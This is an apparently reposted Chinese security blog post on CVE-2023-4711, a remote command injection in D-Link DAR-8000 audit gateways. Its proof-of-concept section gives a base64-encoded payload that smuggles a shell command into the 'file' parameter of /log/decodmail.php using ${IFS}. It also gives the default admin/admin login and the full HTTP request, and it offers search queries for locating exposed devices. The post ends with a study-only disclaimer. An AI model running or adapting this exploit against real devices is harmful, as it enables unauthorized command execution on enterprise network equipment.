简介
D-LINK DAR-8000系列上网行为审计网关提供完善的互联网访问行为管理解决方案,全面保护企业的运营效率和信息安全。DAR-8000系列产品提供全面的应用识别和控制能力、精细化的应用层带宽管理能力、分类化的海量URL过滤能力、详尽的上网行为审计能力以及丰富的上网行为报表,从而帮助企业快速构建可视化、低成本以及高效安全的商业网络。
开发语言:PHP
漏洞描述
D-Link DAR-8000-10 中已发现一个漏洞,该漏洞已被列为严重漏洞,直至 20230819。受此问题影响的是文件 /log/decodmail.php 的一些未知功能。对参数文件的操作会导致操作系统命令注入。
影响版本
D-LINK-DAR-8000-10
空间测绘
回复“CVE-2023-4711”获取空间测绘搜索语句漏洞利用
POC
# 需要进行base64编码(${IFS}等于空格)/etc/`sleep${IFS}10`.pcapL2V0Yy9gc2xlZXAke0lGU30xMGAucGNhcA==
1.登录后台,默认账户密码admin/admin
2.发送数据包执行命令
GET /log/decodmail.php?file=L2V0Yy9gc2xlZXAke0lGU30xMGAucGNhcA== HTTP/1.1Host: xxx.xxx.xxxCookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailersConnection: close
参考链接
https://nvd.nist.gov/vuln/detail/CVE-2023-4711https://github.com/TinkAnet/cve/blob/main/rce.md
回复“CVE-2023-4711”获取空间测绘语句
仅供学习交流,勿用作违法犯罪
原文始发于微信公众号(不够安全):CVE-2023-4711:D-LINK DAR-8000审计网关远程命令执行 附POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论